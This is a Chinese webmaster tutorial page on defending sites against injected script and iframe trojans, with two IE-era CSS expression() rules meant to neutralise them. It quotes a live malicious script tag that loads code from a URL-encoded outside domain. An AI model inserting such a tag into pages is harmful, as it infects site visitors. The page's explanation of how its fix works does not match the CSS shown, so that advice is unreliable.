|
|
||||
首页
文学作品 网页设计 平面设计 程序设计 考试认证 基础办公 QQ资源 服务器架设 网站运营 网页资源
|
|
|
| 汉南在线 → 网页设计 → HTML/CSS | |||||||||||
挂马最近非常频繁,挂毒很赚哦这谁都知道,做为站长我们没有能力去阻止他人挂马,但至少要保证自己不被挂马吧?这段时间,我渐渐感到压力,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。想了想,还是要抽空来,在流行挂<script>木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了,或写进你现成的js文件里,找起来很麻烦: 注意,以下地址含有木马,请不要轻易访问: <script src=http://%76%63%63%64%2E%63%6E></script> 汗死,一连插入了N个一样的<script>标记。偶的电脑什么补丁都打了,直接访问这个 var Kfqq, Qqs="******"; qwfgsg="LLLL\\XXXXXLD"; Kfqq = Qqs; 对了,script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他<object>代码,不管这么多,来多少杀多少。 来跟我写CSS,一一搞定它们,我写了2种不同的方案,大家来测试一下哈:
iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/ 网站被挂马解决方案二: iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');} 原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写进网页,也就不会再执行,这样就做到了既然挂上了网页木马也无法运行,当然这只能算是暂时的解决办法,真正的解决办法还得靠网站程序和服务器的安全来保证,代码不是万能的,网马有多种形式,好了不多说了,给别人和自己留条路,希望能帮的到大家!
| |||||||||||
| >> 相关文章 | |||||||||||
| 没有相关文章。 | |||||||||||
|
授权使用:汉南在线 http://www.hzwz.net/(2008-2009) Copyright (c) 2002-2007 汉南在线. All Rights Reserved . 经营许可证:陕ICP备05000109号 Powered by:汉南在线 |